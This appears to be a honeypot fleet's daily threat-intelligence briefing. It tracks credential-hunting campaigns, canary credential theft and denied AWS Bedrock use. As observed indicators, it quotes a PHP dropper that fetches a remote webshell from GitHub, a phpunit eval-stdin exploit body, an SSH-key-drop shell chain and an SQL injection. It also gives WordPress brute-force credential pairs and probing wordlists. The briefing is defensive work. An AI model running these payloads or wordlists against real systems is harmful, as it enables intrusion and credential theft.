FLUX FLEET — INTEL BRIEFING №10

Period: 2026-09-04 07:32 – 2026-09-05 07:32 UTC (24h digest window, day 9 of operations)
Sources: 3 honeypot nodes — canary-farm-1 (EU-hot), ai-devbox-1 (EU), control-1 (Middle East)
Confidence: High (direct observation; 9-day baseline, every result-tag spike attributed by spot query)

The digest window starts at the previous digest run time, and the +4 h timestamp cast widens the effective query window to ~03:32 UTC on 09-04. Events from 03:32 to 07:32 UTC on 09-04 appear in both this digest and №9's data. The genuinely new data starts at 07:32 UTC on 09-04. All times are UTC.

BLUF

A fourth consecutive GCP-BE run minted and used fleet canaries in AWS: 34.23.228.150 minted 11 credentials on control-1 and fired 20 denied Bedrock Converse calls from 19 fleet canaries — the second confirmed mint-to-AI-inference use. A second, new GCP runner (34.79.70.110, aidev) got zero mints: all 21 /.env attempts returned upstream 400s. A new mass-scale operator, crusader-worker/1.0, hit aidev from 114 IPs in 51 minutes (2,151 events) and minted 11 credentials. NIGHTAGENT returned for a second consecutive day with a new source IP (41.142.109.20, same ASN) and the same GitHub dropper. WP-LOGIN-BRUTE reached aidev for the first time: 62 source IPs, 74 distinct credential pairs, and password guesses that fold both TLS identities (sso, inference) into the wordlist. Aidev volume rose 41%; control fell 50% with no census burst replacing 87.120.104.29's day-8 run.

Key Judgements

  1. METADATA-HUNT is a persistent operator, not a rotating opportunistic set: four consecutive days of Google Cloud (BE/US) runners, and the mint-to-AWS-use funnel closed for the second time. 34.23.228.150 minted 11 canaries on control-1 at 21:34–21:35 on 09-04 under the forged AI-crawler UA set (GPTBot/1.2, GrokBot/1.0, ChatGPT-User/1.0, Perplexity-User/1.0, ClaudeBot/1.0, OAI-SearchBot/1.3, plus Twitterbot, TelegramBot, Amazonbot — a wider set than №9's). Tracebit then recorded 20 denied Converse operations from 19 of those credentials, one use IP. (High confidence — Tracebit alerts joined to flux mints on collector IP; UA set and 578-path template match the day-7/8 runs; 12 POSTs identical in shape)
  2. A new distributed sweep operator ("crusader-worker/1.0") ran the fleet's largest single-window source pool: 114 IPs, 2,151 events on aidev in 51 minutes (06:39–07:30 on 09-05). The workers share a 19-path wordlist (/.env variants, /actuator/env, /actuator/configprops, /_ignition/health-check, /storage/logs/laravel.log, /wp-config.php*, and a self-identifying /crusader-404-probe). 110 IPs sit in GCP ranges (34.x/35.x/136.116.x), 3 in Oracle Cloud (8.x). Each worker runs the list twice. 11 credentials minted; 94 /.env attempts returned upstream 400s (tracebit-http-error). A single control-1 worker (34.106.82.228, 19 events, 06:56) confirms the pool targets the whole fleet, one worker per IP. (High confidence — UA, wordlist, and timing verified by direct query; the /crusader-404-probe path is a unique fingerprint)
  3. WP-LOGIN-BRUTE spread to aidev and now guesses both TLS identities. 62 distinct IPs POSTed 74 credential pairs (74 wp-login-credentials rows, every pair distinct). Eight sources are IPv6. Verbatim pairs from the window: log=webmaster&pwd=sso%40kh3b, log=editor&pwd=editor%40sso, log=admin&pwd=inference%40123, log=admin&pwd=admin%40inference.com, log=admin&pwd=inference, log=webmaster&pwd=sso123, log=webmaster&pwd=sso. The sso family targets the farm TLS identity; the inference family targets the aidev identity — the wordlist is node-aware on both EU nodes now. (High confidence — 74 distinct bodies captured verbatim; aidev's 16 credential POSTs from 17 new IPs started 03:29 on 09-05)
  4. NIGHTAGENT's day-9 run confirms the kit, not the IP, is the actor. 41.142.109.20 (Office National des Postes, MA — same ASN as 196.206.35.222) ran the full loop on both EU nodes 05:07–05:48 on 09-05: 540 events, 54 POSTs, 6 mints. The phpunit verify body and dropper are byte-identical to №9's, including the GHSAT token. (High confidence — bodies captured verbatim; second consecutive day with a rotated residential IP)

Active Campaigns (day 9 status)

⟳ METADATA-HUNT (GCP-BE/US, forged AI-crawler UAs) — hostile, second AWS use

  • Actors: 34.23.228.150 (Google LLC, US, control-1, 803 events, 578 paths, 12 POSTs, 11 mints, 21:34–21:35 on 09-04) and 34.79.70.110 (Google LLC, BE, aidev, 742 events, 570 paths, 12 POSTs, 0 mints, 01:57 on 09-05). Four consecutive days of GCP runners now: 130.211.73.106, 207.175.90.192 + 34.38.121.96, this pair.
  • TTPs: Same 130–139-family Vite/IMDS template (/__aws_leak_probe_*__, /@fs/proc/self/environ, /@fs/root/.aws/credentials, /.mcp.json, /.azure/credentials). The control-1 runner's mint attempts succeeded (11); the aidev runner's /.env hits all failed upstream (21 × 400, result tracebit-http-error). 34.23.228.150 then used 19 canaries in AWS: 20 denied Converse calls, one use IP, zero successes.
  • Assessment: The mint-to-AI-inference funnel is now a repeatable behavior, not a one-off. The aidev run minted nothing but still walked 570 paths — the operator sweeps every node profile regardless of mint success. Watch for a fifth GCP IP; the control and aidev AI-credential surfaces are the targets.

⚠ CRUSADER-SWEEP (crusader-worker/1.0) — hostile, NEW, mass-distributed

  • Actors: 114 IPs: 110 GCP (34.x, 35.x, 136.116.72.68, 136.110.98.5), 3 Oracle Cloud (8.234.99.163, 8.234.199.186, 8.228.43.251), 1 on control-1 (34.106.82.228). Window: 06:39–07:30 on 09-05, single run.
  • TTPs: Honest UA crusader-worker/1.0. Fixed 19-path wordlist: /.env, /.env.backup, /.env.bak, /.env.dev, /.env.example, /.env.local, /.env.old, /.env.prod, /.env.production, /.env.save, /env, /actuator/env, /actuator/configprops, /wp-config.php.bak, /wp-config.php.swp, /wp-config.php~, /_ignition/health-check, /storage/logs/laravel.log, /crusader-404-probe. Four "lead" workers (34.78.243.24, 34.92.8.132, 34.11.48.79, 35.243.113.50) each ran 38 events (the list twice), the rest 19 each. 12 workers also probed /.git/config under 13 web-root prefixes (/var/www/, /html/, /htdocs/, /backend/, /www/, /public/, /wordpress/, /src/, /app/, /api/, /core/, /lib/, /web/).
  • Assessment: A serverless-style credential sweep: one function per IP, one shared wordlist. The self-naming /crusader-404-probe is a deliberate fingerprint — the operator does not hide. The kit mints real canaries (11), so treat it as hostile inventory collection despite the honest UA. 94 upstream 400s at /.env mirror the known rapid-retry rejection, but here spread across 94 distinct workers rather than one IP.

⟳ NIGHTAGENT (residential MA) — hostile, second consecutive day

  • Actors: 41.142.109.20 (Office National des Postes e, MA). 540 events: farm 264, aidev 276, 05:07–05:48 on 09-05. 54 POSTs (27 per node), 6 mints. 196.206.35.222's final №9 tail (24 events, 08:23–08:26 on 09-04, 6 mints) closes that run.
  • TTPs: The four-step loop, verbatim bodies unchanged from №9: verify <?php echo "NightAgent";?> to /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php, dropper <?php copy('https://raw.githubusercontent.com/nightagents/nightshell/refs/heads/main/night.php?token=GHSAT0AAAAAACYWDMT5UQIYLJJSWO5KVDNIZYGPEDA','night.php');readfile('night.php'); ?>, form login user=root&pass=wrong, wp-batch multiplex with the UNION SELECT SQLi body, /.env mint. New this run: webapp-config-bundle-js enumeration (60 config.js-variant paths per node) and Tomcat path-bypass probes (/..;/env.dev.js).
  • Assessment: Two consecutive days, two different residential IPs from the same Moroccan ASN. The GHSAT token has not rotated in 24 h — it is a search indicator with a shelf life. CVE-2017-9841 against a non-existent phpunit install: no execution.

⟳ WP-LOGIN-BRUTE (distributed credential brute) — hostile, escalated to aidev

  • Actors: 62 IPs POSTing credentials (74 pairs), 53 on farm and 17 on aidev (overlapping set), 8 IPv6 sources (2a01:4f8:271:188f::3, 2a04:3543:1000:2310:28ac:59ff:fedf:535, 2a03:4000:3d:d0:b836:5cff:fec3:1800, 2001:41d0:801:2000::1223, 2a0a:4cc0:80:9fd:64d6:afff:fe9f:f343, 2400:b800:6::21, 2001:df1:a9c0:39::a, 2a03:4000:3d:d0:b836:5cff:fec3:1800). One burst per IP, spread 03:29–07:29 on 09-05. Identical forged UA on the bulk of sources: Chrome/151.0.0.0 on Windows.
  • TTPs: One GET /wp-login.php probe, then 1–3 credential POSTs per IP. 74 distinct pairs in 74 POSTs — every POST a new pair. Username set: admin, webmaster, editor, with node-identity guesses (Key Judgement 3). Sample verbatim: _wpnonce=77875c4c06&log=admin&pwd=admin99&redirect_to=%2Fwp-admin%2F&rememberme=forever&testcookie=1&wp-submit=Log+In.
  • Assessment: Wordlist grew 52 → 74 pairs and the operator now runs the farm and aidev lists in parallel. Both TLS identities are folded into password guesses. The inference family did not exist in №9 — the aidev spread is new. No mints; low-and-slow against rate limits.

⟳ RCE-SWARM / libredtail kit — hostile, fleet-wide, slowest day since №7

  • Actors: Three IPs this window: 103.118.29.32 (49 events per EU node, 01:24 farm / 05:44 aidev on 09-05), 31.77.78.18 (control, 10 events, 01:39 on 09-05), 156.227.234.198 (1 event, farm). All-time: 39 IPs, 1,725 events.
  • TTPs: Unchanged kit: libredtail-http UA, phpunit eval-stdin.php with body <?php echo(md5("Hello PHPUnit"));, PHP-CGI /bin/sh traversal. 31.77.78.18 POSTed a base64 shell_exec chain to the CGI traversal, decoded head: cd /tmp || cd /var/tmp || cd /dev/shm; echo '-----BEGIN OPENSSH PRIVATE KEY-----… — an SSH key drop attempt.
  • Assessment: Volume fell from №9's seven new IPs to three, but the control-1 SSH-key payload is a step past the usual id probe: the kit writes a persistence key when the CGI bug hits. Zero executions fleet-wide; the payload host 217.60.195.113 still shows zero callbacks after 9 days.

⟳ WP-BATCH (wp-json batch multiplex) — hostile, one heavy aidev actor

  • Actors: 195.178.110.132 (Techoff Srv Limited, BG, blocklist ipsum:1). 271 events on aidev, 01:01–01:10 on 09-05, 192 POSTs. 98 events from the same journey on 8 nodes of path variants.
  • TTPs: 189 {"requests":[]} empty-body POSTs to /wp-json/batch/v1 and its case/variant spellings across 10 web-root prefixes (/, /wp/, /wordpress/, /blog/, /wp/wordpress/), plus 54 GETs to /wp/wp/v2/posts/999999 and /wordpress/wp/v2/posts/999999. Before the flood: GravitySMTP mock-data probes (/wp-json/gravitysmtp/v1/tests/mock-data, 200s), matching the BUCKLOG-KIT entry chain. UA rotates mid-run: Chrome/120, WordPress/6.4.3, Chrome/131, then 8 device-specific browser strings for the tarpit stretch. 3 tarpit-module POSTs of 880/3,790/3,790 bytes; bodyPreview null (tarpit swallowed the bodies).
  • Assessment: The empty-array batch flood is a new WP-BATCH variant — 189 zero-payload multiplexes in one minute. The GravitySMTP first-touch matches BUCKLOG-KIT's chain, but no reverse shell followed. Unverified link; watch this actor.

⟳ REGISTRY-HUNT (LeakIX) — borderline, wave intact

  • Actors: 8 l9scan IPs this window (evening wave 20:23–20:32 on 09-04): 157.245.36.108, 209.38.208.202, 165.227.173.41, 206.189.95.232 on farm; 138.68.82.23, 167.99.182.39, 157.245.113.227, 64.225.75.246 on aidev. 41 events, 3 POSTs, 1 mint each. Plus l9explore/1.2.2 from 193.32.204.199: 50 farm events, 48 paths, 12:35 on 09-04, no mints.
  • TTPs: Fixed 27-step registry-walk journey unchanged. Each l9scan IP takes exactly 1 mint.
  • Assessment: Scale held steady vs №9 (7 IPs → 8). The mint count per wave stays at 1 per IP. Report the activity; distinguish it from criminal actors.

⟳ OMEGA-SWEEP (Omegatech /24) — hostile, dormant this window, pool probing continues

  • Actors: No 94.154.46.x census ran in this window (94.154.46.243's 1,803-event control census at 03:42 on 09-04 was №9's overlap data). Three 94.154.43.x IPs (a new Omegatech subnet) touched all 3 nodes with 1-event /.env GETs at 14:45 on 09-04: 94.154.43.146 (farm), 94.154.43.74 (aidev), 94.154.43.254 (control). Two minted (43.146, 43.74).
  • TTPs: Single GET /.env with an honest Chrome/126 or Firefox/71 UA — a connectivity and mint-path check, not a census.
  • Assessment: The operator's hoard behavior continues: 94.154.46.243 holds 71 unused canaries (no new mints this window). The 94.154.43.x touches are pool-availability probes on a new /24 — a third Omegatech range. All-time /24-family census: 6 known IPs on .46.x plus 3 on .43.x.

⟳ GIT-VAULT shape (Hetzner IPv6) — hostile-leaning, second git-internals walker this window

  • Actors: 2a01:4f8:141:225b::2 (Hetzner Online GmbH, DE). 144 events per EU node: aidev 11:01, farm 16:54 on 09-04. Identical 142-path list both nodes, no POSTs, no mints.
  • TTPs: Stale Firefox/78.0 UA. Full .git internals walk: /.git/HEAD, ORIG_HEAD, info/refs, objects/info/packs, logs/refs/remotes/origin/prod, refs/wip/wtree/refs/heads/release, refs/tags/latest, hooks samples — the MEVSPACE-GITWALK mirror-exfiltration template over IPv6.
  • Assessment: Same environment-named ref enumeration as MEVSPACE-GITWALK (which did not return this window). Two operators, one mechanism, now with IPv6 sources. Treat the git-mirror template as commoditized.

⚠ TECHOFF-BURST (199.116.112.3) — hostile, webshell re-verify loop

  • Actors: 199.116.112.3 (Performive LLC, US, blocklist ipsum:1). 225 events on aidev, 17:18–17:21 on 09-04, all GETs, one forged browser UA.
  • TTPs: Six webshell paths (/index.php ×90, /download.php ×42, /read.php ×42, /view.php ×33, /page.php ×14, /home.php ×4) in a re-fetch loop; 22 of the requests tagged webshell-command (status 200 from the tarpit module). The paths answer 200, so the actor keeps re-fetching — a verify loop against a fake webshell.
  • Assessment: The aidev webshell family answers 200 by design; the actor believes it found live shells and loops. The webshell-command spike (22 events, 7d avg 0) is entirely this actor plus 5 events from 72.205.0.93 (same shape, 16:22–16:35). No exploitation POSTs followed. Treat as a scanner that cannot tell a tarpit from a shell.

Standing actors (persistence check)

  • 194.180.49.37 (MEVSPACE BG, Go-http-client + rotating browser UAs) — returned after №9's absence with its largest run: 1,390 events across all 3 nodes (aidev 810, control 514, farm 66), 16:02–17:41 on 09-04. First full 3-node journey: exhaustive .env-variant walk, phpinfo sweeps (106 events, 67 distinct paths like /crm/info.php, /webdav/info.php), webshell probes (135), Yii/Symfony debug paths, TeamCity RPC token path (/app/rest/users/id:1/tokens/RPC2), /cli repeats. 4 mints this window; all-time 23. The fake-git-error spike (161 events, 14.1× baseline) is this actor's .git walk plus the GCP pair's.
  • 91.245.74.31 (Go-http-client) — new standing actor: 4 events across all 3 nodes (farm, control, aidev single /.env GETs), 10:52–23:55 on 09-04, 4 mints all-time. Low-and-slow single-path collector on a fresh IP.
  • 91.92.241.215 (audit-site/2.0-go) — third consecutive day, same pattern: 36 events per EU node at 08:15 on 09-04, .env-variant walk + random .audit404 canary paths, 1 mint per node. The French "authorized audit" UA with a credential walk stays hostile-classified.
  • 80.94.95.211 (SS-Net, RO) — day 9: 169 farm events at 11:07 on 09-04, 168 paths, 14 families, 1 mint. Aidev appearance from №9 not repeated; farm-only this window. All-time 7 mints.
  • 72.167.41.202 (axios/1.18.0) — new small collector: 6 events, 6 mints (3 farm, 3 aidev) at 18:22 on 09-04, alternating /.env and /.env.local with the aidev Host header inference.fapthropic.com on one request. Deliberate dual-node mint.
  • 152.32.226.8 / 195.178.110.28 (Go-http-client) — tarpit-loop probes on control with _hp_chain/_hp_hop query tags (152.32.226.8: 171 events, favicon.ico and / at hop counts 1–5, 10:28–10:34 on 09-04). The _hp_* parameters mark an upstream redirect-chain tracker following the tarpit; journeys stay shallow. Benign-shape, watch.
  • 176.65.148.226 / 182.8.227.195 / 104.238.35.113 / 180.92.230.126 — recurring low-volume minters, 1–2 mints each, unchanged behavior.
  • Departed or absent: INFOCREST-KIT (23.165.56.117) — zero events this window after 2 days; XMLRPC-BRUTE — zero /xmlrpc.php events, second consecutive silent window, mark dormant; CONFIG-SWEEP (87.120.104.29) — the day-8 farm census is overlap data, no new run; BUCKLOG-KIT, MEVSPACE-GITWALK, WP-ENUM, GIT-VAULT (Azure), AI-CREDHUNT — no events.

Benign / research (not hostile)

  • 193.96.224.243 (Nmap Scripting Engine) — 17 events per node (aidev, control), /-only, honest NSE UA. Shallow.
  • 3.129.187.38 (visionheight.com/scan) — 19 control events, / and /robots.txt tarpit only. Self-identifying scan service; shallow.
  • 216.81.200.56 — 48 farm events: robots.txt, service-worker and config-bundle JS paths (/env.js, /settings.js, /firebase-messaging-sw.js), no credential paths, no mints. Web-asset enumerator, benign shape.
  • 47.236.181.241 (stale Opera/9.80 UA) — 27 farm events, / tarpit only.
  • 16.5.0.236 (Hello World UA) — 14 events on all 3 nodes, tarpit handshakes plus 2 SOHO-router credential probes on control: /boaform/admin/formLogin body username=admin&psd=Feefifofum, /goform/formJsonAjaxReq body {"action":"do_login","data":{"username":"admin","password":"admin"}}. IoT-router botnet check; shallow, no mints. Benign-shape but note the credential POSTs.
  • 80.82.77.202 / 93.174.93.12 — the fixed-cadence /-handshake pair, unchanged (45/45/45 and 41 events across nodes).
  • Censys / Palo Alto / zgrab / Odin / WanScannerBot / GenomeCrawlerd — no hostile journeys this window.

Canary credentials

Summary

19 Tracebit alert(s) fired in the window (20 use events across 19 credentials). Fleet sensors minted 79 credentials to 44 collector IPs; 19 credential(s) reached AWS. Use outcomes: 20 failure. Denied operations: Converse×20. 0 call(s) succeeded: . Successes leak identity at most; treat any success beyond sts:GetCallerIdentity as a finding.

Mint → use funnel

Metric Count
Credentials minted (fleet, window) 79
Distinct collector IPs 44
Credentials used in AWS (alerts) 19
Credentials stolen, no observed AWS use in window 60

Per collector (evidence for attribution prose — join each IP against ip-journey and the campaign registry):

Theft IP Sensor Mints (window) Creds used in AWS Use IPs Operations Mint history (6d)
34.23.228.150 control-1 11 19 1 Converse 11 mints since 2026-09-04 21:35
196.206.35.222 ai-devbox-1 3 0 0 12 mints since 2026-09-04 04:09
196.206.35.222 canary-farm-1 3 0 0 12 mints since 2026-09-04 04:09
41.142.109.20 ai-devbox-1 3 0 0 6 mints since 2026-09-05 05:09
41.142.109.20 canary-farm-1 3 0 0 6 mints since 2026-09-05 05:09
72.167.41.202 ai-devbox-1 3 0 0 6 mints since 2026-09-04 18:22
72.167.41.202 canary-farm-1 3 0 0 6 mints since 2026-09-04 18:22
104.238.35.113 ai-devbox-1 2 0 0 2 mints since 2026-09-04 19:15
180.92.230.126 canary-farm-1 2 0 0 2 mints since 2026-09-04 20:26
194.180.49.37 ai-devbox-1 2 0 0 23 mints since 2026-08-29 20:03
91.245.74.31 canary-farm-1 2 0 0 4 mints since 2026-09-04 10:52
136.116.72.68 ai-devbox-1 1 0 0 1 mints since 2026-09-05 06:40
138.2.85.36 canary-farm-1 1 0 0 1 mints since 2026-09-04 23:22
138.68.82.23 ai-devbox-1 1 0 0 2 mints since 2026-09-02 15:20
152.32.235.180 control-1 1 0 0 1 mints since 2026-09-04 15:00
157.245.113.227 ai-devbox-1 1 0 0 4 mints since 2026-08-29 10:55
157.245.36.108 canary-farm-1 1 0 0 2 mints since 2026-09-01 20:40
161.118.213.214 ai-devbox-1 1 0 0 1 mints since 2026-09-05 05:56
161.118.218.203 ai-devbox-1 1 0 0 1 mints since 2026-09-04 23:58
161.118.247.96 canary-farm-1 1 0 0 1 mints since 2026-09-05 05:20
165.227.173.41 canary-farm-1 1 0 0 1 mints since 2026-09-04 20:26
167.99.182.39 ai-devbox-1 1 0 0 3 mints since 2026-09-01 20:50
176.65.148.226 ai-devbox-1 1 0 0 2 mints since 2026-09-04 02:57
182.8.227.195 ai-devbox-1 1 0 0 4 mints since 2026-08-31 20:48
182.8.227.195 canary-farm-1 1 0 0 4 mints since 2026-08-31 20:48
194.180.49.37 canary-farm-1 1 0 0 23 mints since 2026-08-29 20:03
194.180.49.37 control-1 1 0 0 23 mints since 2026-08-29 20:03
199.66.183.226 canary-farm-1 1 0 0 1 mints since 2026-09-04 16:19
206.189.95.232 canary-farm-1 1 0 0 1 mints since 2026-09-04 20:32
209.38.208.202 canary-farm-1 1 0 0 2 mints since 2026-09-02 19:15
213.35.109.13 control-1 1 0 0 1 mints since 2026-09-05 04:44
213.35.112.238 control-1 1 0 0 1 mints since 2026-09-04 22:55
34.101.146.10 ai-devbox-1 1 0 0 1 mints since 2026-09-05 06:40
34.106.11.227 ai-devbox-1 1 0 0 1 mints since 2026-09-05 06:41
34.124.149.137 ai-devbox-1 1 0 0 1 mints since 2026-09-05 06:40
34.185.81.23 ai-devbox-1 1 0 0 1 mints since 2026-09-05 06:39
34.21.74.173 ai-devbox-1 1 0 0 1 mints since 2026-09-05 06:40
34.26.178.207 ai-devbox-1 1 0 0 1 mints since 2026-09-05 06:41
34.26.43.94 ai-devbox-1 1 0 0 1 mints since 2026-09-05 06:40
34.88.144.79 ai-devbox-1 1 0 0 1 mints since 2026-09-05 06:41
34.93.222.152 ai-devbox-1 1 0 0 1 mints since 2026-09-05 06:39
35.226.71.146 ai-devbox-1 1 0 0 1 mints since 2026-09-05 07:16
45.153.34.43 canary-farm-1 1 0 0 2 mints since 2026-09-02 10:32
64.225.75.246 ai-devbox-1 1 0 0 3 mints since 2026-08-29 20:58
67.225.142.170 ai-devbox-1 1 0 0 1 mints since 2026-09-04 17:17
80.94.95.211 canary-farm-1 1 0 0 7 mints since 2026-08-30 21:31
85.209.156.148 ai-devbox-1 1 0 0 1 mints since 2026-09-04 16:19
91.245.74.31 ai-devbox-1 1 0 0 4 mints since 2026-09-04 10:52
91.245.74.31 control-1 1 0 0 4 mints since 2026-09-04 10:52
91.92.241.215 ai-devbox-1 1 0 0 3 mints since 2026-09-04 01:31
91.92.241.215 canary-farm-1 1 0 0 3 mints since 2026-09-04 01:31
94.154.43.146 canary-farm-1 1 0 0 1 mints since 2026-09-04 14:45
94.154.43.74 ai-devbox-1 1 0 0 2 mints since 2026-09-01 13:13

Persistent collectors with no observed AWS use (candidates for hoard/resale/untraced use — check prior briefings for named campaigns):

  • 94.154.46.243: 71 mints, 2026-09-01 12:13 → 2026-09-04 03:42
  • 194.180.49.37: 23 mints, 2026-08-29 20:03 → 2026-09-04 17:18
  • 93.152.223.194: 16 mints, 2026-08-29 14:11 → 2026-08-31 20:34
  • 136.110.80.233: 13 mints, 2026-08-29 14:58 → 2026-08-29 14:58
  • 207.175.90.192: 13 mints, 2026-09-03 07:50 → 2026-09-03 07:50
  • 34.38.121.96: 13 mints, 2026-09-03 09:30 → 2026-09-03 09:30
  • 34.74.98.8: 13 mints, 2026-09-01 09:19 → 2026-09-01 09:19
  • 35.247.178.64: 13 mints, 2026-08-30 11:55 → 2026-08-30 11:55
  • 196.206.35.222: 12 mints, 2026-09-04 04:09 → 2026-09-04 08:26
  • 94.154.46.244: 12 mints, 2026-09-03 11:42 → 2026-09-03 11:42
  • 94.154.46.249: 12 mints, 2026-09-02 13:07 → 2026-09-02 13:08
  • 87.120.104.29: 11 mints, 2026-09-04 05:06 → 2026-09-04 05:06
  • 94.154.46.248: 10 mints, 2026-09-02 12:43 → 2026-09-02 12:43
  • 80.94.95.211: 7 mints, 2026-08-30 21:31 → 2026-09-04 11:07
  • 196.77.107.174: 6 mints, 2026-08-31 22:55 → 2026-08-31 23:24
  • 23.165.56.117: 6 mints, 2026-09-02 22:58 → 2026-09-03 05:15
  • 41.142.109.20: 6 mints, 2026-09-05 05:09 → 2026-09-05 05:47
  • 72.167.41.202: 6 mints, 2026-09-04 18:22 → 2026-09-04 18:22
  • 94.154.46.247: 6 mints, 2026-09-03 17:01 → 2026-09-03 17:01
  • 157.245.113.227: 4 mints, 2026-08-29 10:55 → 2026-09-04 20:27
  • 167.71.175.236: 4 mints, 2026-08-29 10:58 → 2026-09-03 20:26
  • 182.8.227.195: 4 mints, 2026-08-31 20:48 → 2026-09-04 21:18
  • 81.172.241.94: 4 mints, 2026-08-31 07:20 → 2026-08-31 08:11
  • 91.245.74.31: 4 mints, 2026-09-04 10:52 → 2026-09-04 23:55
  • 94.154.46.250: 4 mints, 2026-09-01 15:55 → 2026-09-01 15:56
  • 130.12.180.77: 3 mints, 2026-09-02 00:04 → 2026-09-02 00:07
  • 157.230.19.140: 3 mints, 2026-08-30 20:46 → 2026-09-02 15:13
  • 165.227.39.235: 3 mints, 2026-08-31 20:17 → 2026-09-02 19:34
  • 167.99.182.39: 3 mints, 2026-09-01 20:50 → 2026-09-04 20:27
  • 185.177.72.53: 3 mints, 2026-09-03 03:26 → 2026-09-03 03:26
  • 64.225.75.246: 3 mints, 2026-08-29 20:58 → 2026-09-04 20:27
  • 91.92.241.215: 3 mints, 2026-09-04 01:31 → 2026-09-04 08:15
  • 91.92.41.55: 3 mints, 2026-09-01 07:53 → 2026-09-02 14:41

Canary-use attribution (briefing prose)

All 19 used credentials trace to 34.23.228.150, the METADATA-HUNT control-1 runner (Key Judgement 1). One use IP fired 20 denied Converse calls. This is the second confirmed hostile use of fleet canaries in AWS, and the second against Bedrock — the AI-inference target is now the operator's default, not a probe. The remaining 60 window credentials sit in hostile-held inventory across 43 collectors. OMEGA-SWEEP's 94.154.46.243 still holds the fleet's largest hoard at 71 unused canaries over 4 days, with no new mints this window. NIGHTAGENT's two day-9 IPs (196.206.35.222, 41.142.109.20) hold 12 and 6 respectively with zero AWS use.

Fleet Observations

  • Canary economics: 79 new mints (digest table: farm 41 / aidev 40 / control 36; spot-query window count 79 after the +4 h cast — the digest's 117 includes overlap rows from №9's window). All ["aws"] type. All-time: 491 credentials to 166 collector IPs. Mint failures: 139 × 400, zero 401s. Attribution: 34.79.70.110's 21 (METADATA-HUNT aidev, tracebit-http-error at /.env), 34.23.228.150's 15 (the control-1 pair mint attempt tail), 94 from crusader workers (94 distinct IPs at /.env), the remainder scattered 400s from the GCP sweep pool. Root cause unchanged: upstream rejection of rapid-retry request shapes, not key state.
  • XFF forgery: 0 multi-entry chains, 0 empty-clientIp rows — eighth consecutive clean day post-fix. 1,885 requests carried single-entry XFF.
  • TLS/attribution posture: aidev 800 https against 1,046 inference.fapthropic.com Host events; farm 743 https against 990 sso.rightabouteverything.show events. Control deliberately certless. WP-LOGIN-BRUTE now guesses both TLS identities in passwords (sso@kh3b, inference@123, admin@inference.com) — the attribution surface is an attack surface on both EU nodes. A Contabo rDNS Host (vmi3177282.contaboserver.net, 2,124 aidev events) now outweighs the aidev IP Host header; more scanners resolve rDNS than in №9.
  • Volume: digest window totals 15,703 events (farm 5,868 / aidev 5,877 / control 3,958). Aidev +41% on the crusader-worker sweep (2,132), the GCP aidev run (742), and 194.180.49.37's 810-event walk. Farm −3%: no census burst this window; the №9 top talkers (87.120.104.29, Omegatech) were overlap data. Control −50%: no census replaced №9's Omegatech run; the only control volume is the GCP pair (803) and 194.180.49.37 (514). Every ≥50-event hour attributed: control 09-04 03:00 = Omegatech .243 overlap (1,810); farm 05:00 (09-04) = 87.120.104.29 overlap (3,452); aidev 16:00–17:00 (09-04) = 194.180.49.37 (1,349); control 21:00 = 34.23.228.150 (803); aidev 01:00 (09-05) = 195.178.110.132 (1,018); aidev 05:00–07:00 = 41.142.109.20 + crusader workers (2,675).
  • Control discovery velocity: day 9 ramp reads 39 → 70 → 88 → 107 → 105 → 105 → 100 → 98. Second consecutive decline; the fresh-IP ramp has plateaued at ~100 unique IPs/day. The long-term differential dataset continues.
  • First-seen inventory (not a timeline): new paths resolve to the crusader wordlist (/crusader-404-probe, /actuator/configprops, /_ignition/health-check), the 194.180.49.37 walk (/user_secrets.yml, /database_backup.sql, /_vti_pvt/service.pwd, /wp-admin/setup-config.php), the SOHO router probes on control (/goform/formJsonAjaxReq), and the info*.php webshell set. New UAs: crusader-worker/1.0, visionheight.com/scan, Nmap Scripting Engine, Hello World, stale Opera/9.80, and the python-requests/2.6.0 CPython/2.7.5 string from 80.94.93.9 (SS-Net range, aidev + control, 19 events).
  • Digest quirks (all re-confirmed this run): control-byte-stripped copy needed for UTF-8 reads; +4 h timestamp cast; single-writer DuckDB lock (all spot queries run sequentially); sync-arrival first-seen stamps; window overlap with №9 cross-checked before counting.
  • Infrastructure: no fleet-side changes this cycle.

Gaps / Next Collection

  1. Fifth GCP-BE run — four consecutive days now (130.211.73.106, 207.175.90.192 + 34.38.121.96, 34.23.228.150 + 34.79.70.110). Pull the Tracebit per-alert logs for the second Converse use IP and compare it to №9's — same use IP means one operator account; different means the credentials move between hands. This is now the fleet's highest-value attribution question.
  2. Crusader sweep second run — the 06:39–07:30 sweep ended minutes before the digest horizon. Check whether the worker pool re-fires next window and whether the 12 git-config-probing workers return; one run is a test, two is a campaign. Watch for the wordlist to expand beyond 19 paths.
  3. Hoarded inventory — 94.154.46.243's 71-canary hoard is 4 days old with zero AWS use. Its /24 sibling pool (94.154.43.x) began single-GET probes this window. Watch Tracebit for any use event from the .46.x hoard; a use after this much delay indicates batch-later or resale workflow.
  4. NightAgent token rotation — the GHSAT token in the nightagents/nightshell dropper has not changed across two runs and two source IPs. Re-check the repo visibility and token validity; a dead token retires the search indicator.
  5. XMLRPC-BRUTE — second consecutive silent window. Mark the campaign dormant at 4,000 all-time POSTs and release the watch.
  6. WP-LOGIN-BRUTE wordlist growth — 52 → 74 pairs, farm → farm+aidev. If the pair count keeps growing and the node-identity guesses (sso/inference) get username-side variants too, the operator is fingerprinting per-node. Generated on medina (headless systemd run). Digest: /data/flux-logs/reports/flux-digest-2026-09-05.md. Spot queries: flux-query.sh fleet-24h, crossnode-reuse, mint-health, mint-collectors, ip-journey (195.178.110.132), plus 24 ad-hoc v_full queries (crusader census and per-worker wordlists, GCP pair mint-failure attribution, wp-login pair corpus, NightAgent loop bodies, libredtail SSH-key payload, 194.180.49.37 three-node walk, Omegatech /24 pool probes, LeakIX wave, Hetzner IPv6 git walk, 400-failure attribution, crusader control-1 worker) and the Tracebit canary-section generator.